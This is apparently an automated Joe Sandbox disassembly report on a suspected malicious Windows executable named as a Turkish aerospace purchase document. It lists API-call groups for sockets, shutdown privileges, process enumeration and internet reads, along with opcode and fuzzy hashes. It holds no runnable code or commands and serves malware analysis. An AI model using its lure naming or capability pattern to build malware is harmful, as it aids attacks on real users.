                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 01003C0A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                    • Opcode ID: 9cbb46caf6486ed5eb38368d9713633468e27462e7963c49c754f2ca40454d93
                                                                                                                                    • Instruction ID: 27a1480aa44e44c3ecbd10981aa19181102e12c95e7c5d13a74a9fc23d416237
                                                                                                                                    • Opcode Fuzzy Hash: 9cbb46caf6486ed5eb38368d9713633468e27462e7963c49c754f2ca40454d93
                                                                                                                                    • Instruction Fuzzy Hash: E9317C710083859FD316EF24DC91DAFBBE8BE96214F404D1DF4D586192EB29DA08DB62
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                                                                                      • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                                                                                      • Part of subcall function 00FF87E1: GetLastError.KERNEL32 ref: 00FF8865
                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 010051F9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                                                                    • API String ID: 2234035333-194228
                                                                                                                                    • Opcode ID: 6f942d3e2bf1eb797f76696e46b4f32783daea79fb4a5a4fbbddea1d8e70f908
                                                                                                                                    • Instruction ID: 42d4a71b61fd76e3d1c1b3781746222ed607c5c0e96b30ef608f7976db1dc27d
                                                                                                                                    • Opcode Fuzzy Hash: 6f942d3e2bf1eb797f76696e46b4f32783daea79fb4a5a4fbbddea1d8e70f908
                                                                                                                                    • Instruction Fuzzy Hash: 84017B35791216ABF77A266C9C8AFBB72A8EF07380F100560FEC3E20C2D9551C008E90
                                                                                                                                    APIs
                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010162DC
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010162EB
                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 01016307
                                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 01016316
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01016330
                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 01016344
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279440585-0
                                                                                                                                    • Opcode ID: 1e48c39b159af124dd0fb8d02c1c6ec22c39770a09622a6cfe901af3dbb8dc44
                                                                                                                                    • Instruction ID: 70f6fdb9a06190fe1b5f68eb3902889e250f3f3c3f5fe2230ff9cb83d3bdf0c1
                                                                                                                                    • Opcode Fuzzy Hash: 1e48c39b159af124dd0fb8d02c1c6ec22c39770a09622a6cfe901af3dbb8dc44
                                                                                                                                    • Instruction Fuzzy Hash: 8B21F2702002059FCB20EF68CC45A6EB7F8EF45320F248258E996E7395CBB9AD01DB61
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                                                                                      • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                                                                                    • _memmove.LIBCMT ref: 00FF0258
                                                                                                                                    • _memmove.LIBCMT ref: 00FF036D
                                                                                                                                    • _memmove.LIBCMT ref: 00FF0414
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1300846289-0
                                                                                                                                    • Opcode ID: 9af1663907bcefa3c62fb1ba9ef476fb9ed17caf92761ca013614789982cc0bb
                                                                                                                                    • Instruction ID: fdd47070f93ac904e1c825d2fc1e02fba07c7ae59848f0192ec23648cbcc4d57
                                                                                                                                    • Opcode Fuzzy Hash: 9af1663907bcefa3c62fb1ba9ef476fb9ed17caf92761ca013614789982cc0bb
                                                                                                                                    • Instruction Fuzzy Hash: 3402D0B1E00209DBCF04DF65D982ABEBBB5EF44310F148069E90ADB255EF39D911EB91
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FA19FA
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FA1A4E
                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00FA1A61
                                                                                                                                      • Part of subcall function 00FA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FA12D8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ColorProc$LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3744519093-0
                                                                                                                                    • Opcode ID: 070a6ceef8ad15ababdf7021e55c1766a8c71c112a15eb5c7a23b1fec9b611ff
                                                                                                                                    • Instruction ID: c3e663edd78890bb2f64e6557a88e02d1af836faf53754892dbc950fbb91915e
                                                                                                                                    • Opcode Fuzzy Hash: 070a6ceef8ad15ababdf7021e55c1766a8c71c112a15eb5c7a23b1fec9b611ff
                                                                                                                                    • Instruction Fuzzy Hash: EDA139F2506596FAE638AE288C54EBF355DFF473A1F1B010AF542D6291CA2D8D01F272
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01017D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01017DB6
                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0101679E
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010167C7
                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 01016800
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0101680D
                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 01016821
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 99427753-0
                                                                                                                                    • Opcode ID: c1bbb96f209f7b54e0e0f32b50e00ca9fdc7a440d641fe31455b71114a610f01
                                                                                                                                    • Instruction ID: 6cfb7f1789635b535ada9dd10bad53bc1e129618d9b8584ed97c0d503905c283
                                                                                                                                    • Opcode Fuzzy Hash: c1bbb96f209f7b54e0e0f32b50e00ca9fdc7a440d641fe31455b71114a610f01
                                                                                                                                    • Instruction Fuzzy Hash: D141C2B5A00210AFDB20BF248C86F6E77E8AF06754F44856CF955AB3C2DABC9D019791
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                    • Opcode ID: b2b437dcf21eb78ce7e3cdb281c24e189f59d18302cb570cd24c4c53fcde7525
                                                                                                                                    • Instruction ID: 670a0f23cae3ec4601a8a73cd6053e49a11ea6c80efead6be667c0108bb3f382
                                                                                                                                    • Opcode Fuzzy Hash: b2b437dcf21eb78ce7e3cdb281c24e189f59d18302cb570cd24c4c53fcde7525
                                                                                                                                    • Instruction Fuzzy Hash: 7A11E7717001216FEB315F2ADC44AAEBBE9FF457A1F548068F9C5D3241CBB8D8018BA8
                                                                                                                                    APIs
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FF80C0
                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FF80CA
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FF80D9
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FF80E0
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FF80F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                    • Opcode ID: bd4a7b93057980619cdbcd1ef3a8a94ff87aef6d61f12688fce9da9daf9d447b
                                                                                                                                    • Instruction ID: 578e9a5683c6ad83ee1a43e7ad780f598e95dbb9a1a9d0869647d459ca5e1c0e
                                                                                                                                    • Opcode Fuzzy Hash: bd4a7b93057980619cdbcd1ef3a8a94ff87aef6d61f12688fce9da9daf9d447b
                                                                                                                                    • Instruction Fuzzy Hash: 3DF04431640205AFDB301E65DC8DE773BBCEF457E5B600115F645C6250CB659C42DB60
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0100C432
                                                                                                                                    • CoCreateInstance.OLE32(01032D6C,00000000,00000001,01032BDC,?), ref: 0100C44A
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    • CoUninitialize.OLE32 ref: 0100C6B7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                    • String ID: .lnk
                                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                                    • Opcode ID: 560cf9a0dc72b05bc1180724e91f81d568908c00de011e5880ff9217ad2e72d6
                                                                                                                                    • Instruction ID: 67e449088993bf2f5256eb27139dbd7f0f63f0c85d530651fbf58c068432dbe7
                                                                                                                                    • Opcode Fuzzy Hash: 560cf9a0dc72b05bc1180724e91f81d568908c00de011e5880ff9217ad2e72d6
                                                                                                                                    • Instruction Fuzzy Hash: 8FA13AB1108205AFD700EF54CC81EABB7ECEF89354F00492CF1959B1A2DBB5EA09CB52
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4AD0), ref: 00FA4B45
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA4B57
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                                    • Opcode ID: 6c93e1cbb7fff1de9fc5b505fb4092ef12305daac6de52cb4339b59340677e09
                                                                                                                                    • Instruction ID: ebc6d9139b383b5e8a6f53b48b60b613de144aab02347c3165f29fce8eb69632
                                                                                                                                    • Opcode Fuzzy Hash: 6c93e1cbb7fff1de9fc5b505fb4092ef12305daac6de52cb4339b59340677e09
                                                                                                                                    • Instruction Fuzzy Hash: EAD01274A10723CFD7309F32D828B06B6F4AF867D1B21882DD4C5D6100D7B4E880C764
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 674341424-0
                                                                                                                                    • Opcode ID: 674e01c9df112c2558dc2496b1a74b9b61d8c81e75cbd1aec7cc3db74e55e4eb
                                                                                                                                    • Instruction ID: 08c702879bec1227a199222c127bf9b3515c2ac70390ddda464b6b660e7b62ea
                                                                                                                                    • Opcode Fuzzy Hash: 674e01c9df112c2558dc2496b1a74b9b61d8c81e75cbd1aec7cc3db74e55e4eb
                                                                                                                                    • Instruction Fuzzy Hash: 6022BC71A083419FC724DF25C881BAFB7E4AF85750F14492CF88A97291DB79E904EF92
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0101EE3D
                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0101EE4B
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0101EF0B
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0101EF1A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2576544623-0
                                                                                                                                    • Opcode ID: 97a41d3164c7024e0ddc446e2201794add6b67a88f7c90242ff6bf7044a72acd
                                                                                                                                    • Instruction ID: 8b9c27e389488a9a139d51132f80ad4b3ff87cb0337bb0e80bc079e58a6f866f
                                                                                                                                    • Opcode Fuzzy Hash: 97a41d3164c7024e0ddc446e2201794add6b67a88f7c90242ff6bf7044a72acd
                                                                                                                                    • Instruction Fuzzy Hash: 59517EB15083019FD321EF24CC81E6BB7E8EF99750F50482DF99597291EB78E908DB92
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3964851224-0
                                                                                                                                    • Opcode ID: 780d001d6c705d5e8a44142abf15218a589dbc670da6e6a97240588f01bd5a2a
                                                                                                                                    • Instruction ID: 8c231c3f5693b8b76a500ba84f1866371867c8867b8f24bfb631d84414d0e412
                                                                                                                                    • Opcode Fuzzy Hash: 780d001d6c705d5e8a44142abf15218a589dbc670da6e6a97240588f01bd5a2a
                                                                                                                                    • Instruction Fuzzy Hash: CA926771A083418FD720DF15C480B6BB7E1BF89314F14896DE88A9B262DB75EC45EF92
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FFE628
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen
                                                                                                                                    • String ID: ($|
                                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                                    • Opcode ID: 8785a08b753f55fee2cbf299c4635e120bbca3a8e455963fafa330f0d97e4919
                                                                                                                                    • Instruction ID: 149df8bf2543ee9bca8f0b22553a161481a48c4b683cbf9f2434c7ef7a8ab6e6
                                                                                                                                    • Opcode Fuzzy Hash: 8785a08b753f55fee2cbf299c4635e120bbca3a8e455963fafa330f0d97e4919
                                                                                                                                    • Instruction Fuzzy Hash: FD322575A007099FD728DF19C481A6AB7F1FF48320B15C46EE99ADB3B1EB70A941CB44
                                                                                                                                    APIs
                                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0101180A,00000000), ref: 010123E1
                                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01012418
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
